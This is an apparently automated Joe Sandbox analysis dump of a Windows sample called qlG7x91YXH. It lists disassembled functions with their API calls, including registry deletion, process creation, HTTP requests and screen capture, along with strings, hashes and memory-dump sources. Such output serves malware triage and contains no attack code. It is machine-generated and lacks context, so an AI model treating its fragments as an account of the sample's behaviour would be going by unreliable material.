                                              • Opcode Fuzzy Hash: cd7747440f55c17b8824b2064be8e88bdf8295eb6d5e3eef6c35682544ccc178
                                              • Instruction Fuzzy Hash: 1C812371A04305BBDB25AF64DC92FEE77A8EF15740F088424F809AA186FB71DA51C7B1
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 00DD5A2E
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DD5A40
                                              • SetWindowTextW.USER32(?,?), ref: 00DD5A57
                                              • GetDlgItem.USER32(?,000003EA), ref: 00DD5A6C
                                              • SetWindowTextW.USER32(00000000,?), ref: 00DD5A72
                                              • GetDlgItem.USER32(?,000003E9), ref: 00DD5A82
                                              • SetWindowTextW.USER32(00000000,?), ref: 00DD5A88
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DD5AA9
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DD5AC3
                                              • GetWindowRect.USER32(?,?), ref: 00DD5ACC
                                              • _wcslen.LIBCMT ref: 00DD5B33
                                              • SetWindowTextW.USER32(?,?), ref: 00DD5B6F
                                              • GetDesktopWindow.USER32 ref: 00DD5B75
                                              • GetWindowRect.USER32(00000000), ref: 00DD5B7C
                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DD5BD3
                                              • GetClientRect.USER32(?,?), ref: 00DD5BE0
                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DD5C05
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DD5C2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                              • String ID:
                                              • API String ID: 895679908-0
                                              • Opcode ID: f8a155c22e6828291776a9aab54d33cfecc22f3a3ca304661743018af7475826
                                              • Instruction ID: 0d0f769794c8ccc2f6c2fccc93025b5ba5e8d9e1d1637ea0cbd7a7b5ad84711e
                                              • Opcode Fuzzy Hash: f8a155c22e6828291776a9aab54d33cfecc22f3a3ca304661743018af7475826
                                              • Instruction Fuzzy Hash: FC717F31900B05AFDB20DFA9DD85B6EBBF5FF48704F14461AE182A26A4D775E944CF20
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                              • API String ID: 176396367-1901692981
                                              • Opcode ID: e13ac54a0696667b70eb8dae78248df71d01bdd67a69b1eb1b470c048d9db4fb
                                              • Instruction ID: c767b147dda596665041bd388c085769bec3d09b4ba23fdf862f6758321a4fcc
                                              • Opcode Fuzzy Hash: e13ac54a0696667b70eb8dae78248df71d01bdd67a69b1eb1b470c048d9db4fb
                                              • Instruction Fuzzy Hash: D0E19532A00616ABCB189FA8C8556EDFBB4FF54750F58811BE456B7340DB30AE49CBB1
                                              APIs
                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D900C6
                                                • Part of subcall function 00D900ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E4070C,00000FA0,AA1AA412,?,?,?,?,00DB23B3,000000FF), ref: 00D9011C
                                                • Part of subcall function 00D900ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DB23B3,000000FF), ref: 00D90127
                                                • Part of subcall function 00D900ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DB23B3,000000FF), ref: 00D90138
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D9014E
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D9015C
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D9016A
                                                • Part of subcall function 00D900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D90195
                                                • Part of subcall function 00D900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D901A0
                                              • ___scrt_fastfail.LIBCMT ref: 00D900E7
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
                                              Strings
                                              • SleepConditionVariableCS, xrefs: 00D90154
                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D90122
                                              • WakeAllConditionVariable, xrefs: 00D90162
                                              • InitializeConditionVariable, xrefs: 00D90148
                                              • kernel32.dll, xrefs: 00D90133
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                              • API String ID: 66158676-1714406822
                                              • Opcode ID: ff2097f9784a2325894297679504bc6772230e76ce66d28e54b5dc941d2abf49
                                              • Instruction ID: 9e8a14c55f258ddd4d0955eacf98b4bf4ce25400e4d5f363716eee11f6ac01c7
                                              • Opcode Fuzzy Hash: ff2097f9784a2325894297679504bc6772230e76ce66d28e54b5dc941d2abf49
                                              • Instruction Fuzzy Hash: A7210B32A45710AFDB216BA5BC09B6A3BA4DB05F51F14023AF901F36D1DB759C448AB1
                                              APIs
                                              • CharLowerBuffW.USER32(00000000,00000000,00E0CC08), ref: 00DE4527
                                              • _wcslen.LIBCMT ref: 00DE453B
                                              • _wcslen.LIBCMT ref: 00DE4599
                                              • _wcslen.LIBCMT ref: 00DE45F4
                                              • _wcslen.LIBCMT ref: 00DE463F
                                              • _wcslen.LIBCMT ref: 00DE46A7
                                                • Part of subcall function 00D8F9F2: _wcslen.LIBCMT ref: 00D8F9FD
                                              • GetDriveTypeW.KERNEL32(?,00E36BF0,00000061), ref: 00DE4743
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharDriveLowerType
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2055661098-1000479233
                                              • Opcode ID: a674e0a060a850b82d3d58de5d0e47f7815cc1a21ccb9e27e2c5376febbe3ee9
                                              • Instruction ID: 3b6cc769cdb60d2222536a2545912b3f74d50b93341b2650020f451fbd7b2aa5
                                              • Opcode Fuzzy Hash: a674e0a060a850b82d3d58de5d0e47f7815cc1a21ccb9e27e2c5376febbe3ee9
                                              • Instruction Fuzzy Hash: D1B1D1316083429FC710EF2AC891A6EB7E5EFA5720F54891DF49AD7291E730D845CBB2
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DFB198
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB1B0
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB1D4
                                              • _wcslen.LIBCMT ref: 00DFB200
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB214
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB236
                                              • _wcslen.LIBCMT ref: 00DFB332
                                                • Part of subcall function 00DE05A7: GetStdHandle.KERNEL32(000000F6), ref: 00DE05C6
                                              • _wcslen.LIBCMT ref: 00DFB34B
                                              • _wcslen.LIBCMT ref: 00DFB366
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DFB3B6
                                              • GetLastError.KERNEL32(00000000), ref: 00DFB407
                                              • CloseHandle.KERNEL32(?), ref: 00DFB439
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB44A
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB45C
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB46E
                                              • CloseHandle.KERNEL32(?), ref: 00DFB4E3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                              • String ID:
                                              • API String ID: 2178637699-0
                                              APIs
                                              • GetMenuItemCount.USER32(00E41990), ref: 00DB2F8D
                                              • GetMenuItemCount.USER32(00E41990), ref: 00DB303D
                                              • GetCursorPos.USER32(?), ref: 00DB3081
                                              • SetForegroundWindow.USER32(00000000), ref: 00DB308A
                                              • TrackPopupMenuEx.USER32(00E41990,00000000,?,00000000,00000000,00000000), ref: 00DB309D
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DB30A9
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                              • String ID: 0
                                              • API String ID: 36266755-4108050209
                                              APIs
                                              • DestroyWindow.USER32(?,?), ref: 00E06DEB
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E06E5F
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E06E81
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06E94
                                              • DestroyWindow.USER32(?), ref: 00E06EB5
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D70000,00000000), ref: 00E06EE4
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06EFD
                                              • GetDesktopWindow.USER32 ref: 00E06F16
                                              • GetWindowRect.USER32(00000000), ref: 00E06F1D
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E06F35
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E06F4D
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 2429346358-3619404913
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC4B0
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC4C3
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC4D7
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DEC4F0
                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DEC533
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DEC549
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC554
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC584
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC5DC
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC5F0
                                              • InternetCloseHandle.WININET(00000000), ref: 00DEC5FB
                                              Similarity
                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                              • String ID:
                                              • API String ID: 3800310941-3916222277
                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00E08592
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00E085A2
                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00E085AD
                                              • CloseHandle.KERNEL32(00000000), ref: 00E085BA
                                              • GlobalLock.KERNEL32(00000000), ref: 00E085C8
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00E085D7
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E085E0
                                              • CloseHandle.KERNEL32(00000000), ref: 00E085E7
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E085F8
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC38,?), ref: 00E08611
                                              • GlobalFree.KERNEL32(00000000), ref: 00E08621
                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 00E08641
                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00E08671
                                              • DeleteObject.GDI32(00000000), ref: 00E08699
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E086AF
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              APIs
                                              • VariantInit.OLEAUT32(00000000), ref: 00DE1502
                                              • VariantCopy.OLEAUT32(?,?), ref: 00DE150B
                                              • VariantClear.OLEAUT32(?), ref: 00DE1517
                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DE15FB
                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00DE1657
                                              • VariantInit.OLEAUT32(?), ref: 00DE1708
                                              • SysFreeString.OLEAUT32(?), ref: 00DE178C
                                              • VariantClear.OLEAUT32(?), ref: 00DE17D8
                                              • VariantClear.OLEAUT32(?), ref: 00DE17E7
                                              • VariantInit.OLEAUT32(00000000), ref: 00DE1823
                                              Similarity
                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                              • API String ID: 1234038744-3931177956
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFB6F4
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFB772
                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 00DFB80A
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFB87E
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFB89C
                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DFB8F2
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFB904
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFB922
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DFB983
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFB994
                                              Similarity
                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 146587525-4033151799
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00DF25D8
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DF25E8
                                              • CreateCompatibleDC.GDI32(?), ref: 00DF25F4
                                              • SelectObject.GDI32(00000000,?), ref: 00DF2601
                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DF266D
                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DF26AC
                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DF26D0
                                              • SelectObject.GDI32(?,?), ref: 00DF26D8
                                              • DeleteObject.GDI32(?), ref: 00DF26E1
                                              • DeleteDC.GDI32(?), ref: 00DF26E8
                                              • ReleaseDC.USER32(00000000,?), ref: 00DF26F3
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 00DADAA1
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD659
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD66B
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD67D
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD68F
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6A1
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6B3
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6C5
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6D7
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6E9
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6FB
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD70D
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD71F
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD731
                                              • _free.LIBCMT ref: 00DADA96
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DADAB8
                                              • _free.LIBCMT ref: 00DADACD
                                              • _free.LIBCMT ref: 00DADAD8
                                              • _free.LIBCMT ref: 00DADAFA
                                              • _free.LIBCMT ref: 00DADB0D
                                              • _free.LIBCMT ref: 00DADB1B
                                              • _free.LIBCMT ref: 00DADB26
                                              • _free.LIBCMT ref: 00DADB5E
                                              • _free.LIBCMT ref: 00DADB65
                                              • _free.LIBCMT ref: 00DADB82
                                              • _free.LIBCMT ref: 00DADB9A
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 18059647d9a3c790b67114ff89ac54d5239e64553fb1bec7b141c78de260b7cd
                                              • Instruction ID: 646382d0471e58c1f6c3bd7b8937fbce5d616fcffafecba55248b7af683ca432
                                              • Opcode Fuzzy Hash: 18059647d9a3c790b67114ff89ac54d5239e64553fb1bec7b141c78de260b7cd
                                              • Instruction Fuzzy Hash: EC318D326443049FEB61AA39E845B6B77EAFF12710F294819E48AD7591DF30EC40CB31
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD369C
                                              • _wcslen.LIBCMT ref: 00DD36A7
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00DD3797
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD380C
                                              • GetDlgCtrlID.USER32(?), ref: 00DD385D
                                              • GetWindowRect.USER32(?,?), ref: 00DD3882
                                              • GetParent.USER32(?), ref: 00DD38A0
                                              • ScreenToClient.USER32(00000000), ref: 00DD38A7
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD3921
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD395D
                                              Strings
                                              Similarity
                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                              • String ID: %s%u
                                              • API String ID: 4010501982-679674701
                                              • Opcode ID: c4f509f83ac926dad6c176d509272ca5388e95f86e93030e4fa4130e6cdb8dfc
                                              • Instruction ID: bfcfab8b0faee9c47420adb0444c850cf36bd93014f6b2282362e9f46bdf7c1e
                                              • Opcode Fuzzy Hash: c4f509f83ac926dad6c176d509272ca5388e95f86e93030e4fa4130e6cdb8dfc
                                              • Instruction Fuzzy Hash: 2591F871204706AFD715DF24C895FAAF7A8FF44350F04462AF999D2290DB31EA49CBB2
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD4994
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD49DA
                                              • _wcslen.LIBCMT ref: 00DD49EB
                                              • CharUpperBuffW.USER32(?,00000000), ref: 00DD49F7
                                              • _wcsstr.LIBVCRUNTIME ref: 00DD4A2C
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD4A64
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD4A9D
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD4AE6
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD4B20
                                              • GetWindowRect.USER32(?,?), ref: 00DD4B8B
                                              Strings
                                              Similarity
                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                              • String ID: ThumbnailClass
                                              • API String ID: 1311036022-1241985126
                                              • Opcode ID: d17e74dce1e6aafe2875f7e01f0537f9f60a6fa926e0521f42076e1cc064cffe
                                              • Instruction ID: bf17995617dd2b6ea49dd734f88b5b06d390da7819bc17711a934fbba81165e3
                                              • Opcode Fuzzy Hash: d17e74dce1e6aafe2875f7e01f0537f9f60a6fa926e0521f42076e1cc064cffe
                                              • Instruction Fuzzy Hash: 9591DE310042059FDB04CF14C985BAAB7E8FF54714F08856BFD899A296EB31ED49CBB1
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCC64
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DFCC8D
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCD48
                                                • Part of subcall function 00DFCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DFCCAA
                                                • Part of subcall function 00DFCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DFCCBD
                                                • Part of subcall function 00DFCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFCCCF
                                                • Part of subcall function 00DFCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCD05
                                                • Part of subcall function 00DFCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCD28
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFCCF3
                                              Strings
                                              Similarity
                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2734957052-4033151799
                                              • Opcode ID: d43043300fcf7759bbd6b2a54a921e9ad875192051f56221101513b0ad11751a
                                              • Instruction ID: 853ed75dd0d504e64cd3b0067a0e5d5ae797ade0addcd79572430a923c36b096
                                              • Opcode Fuzzy Hash: d43043300fcf7759bbd6b2a54a921e9ad875192051f56221101513b0ad11751a
                                              • Instruction Fuzzy Hash: 8C318D7190112CBFDB208B91DD88EFFBB7CEF45750F154265BA06E2240DB309A89DAB0
                                              APIs
                                              • timeGetTime.WINMM ref: 00DDE6B4
                                                • Part of subcall function 00D8E551: timeGetTime.WINMM(?,?,00DDE6D4), ref: 00D8E555
                                              • Sleep.KERNEL32(0000000A), ref: 00DDE6E1
                                              • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00DDE705
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DDE727
                                              • SetActiveWindow.USER32 ref: 00DDE746
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DDE754
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DDE773
                                              • Sleep.KERNEL32(000000FA), ref: 00DDE77E
                                              • IsWindow.USER32 ref: 00DDE78A
                                              • EndDialog.USER32(00000000), ref: 00DDE79B
                                              Strings
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: bfac60d44e5d2da68d60312f9bf6331bbe3eb77ccedf7196cfebbb7f68fc2cf5
                                              • Instruction ID: c7ab268b0b841188a472224f90c112483798146b9520702774cb47480cf67547
                                              • Opcode Fuzzy Hash: bfac60d44e5d2da68d60312f9bf6331bbe3eb77ccedf7196cfebbb7f68fc2cf5
                                              • Instruction Fuzzy Hash: C521F674200200BFEB106F33EC89A363B69F755748F65156AF505A52A1DB72EC8D9B31
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DDEA5D
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DDEA73
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDEA84
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DDEA96
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DDEAA7
                                              Strings
                                              Similarity
                                              • API ID: SendString$_wcslen
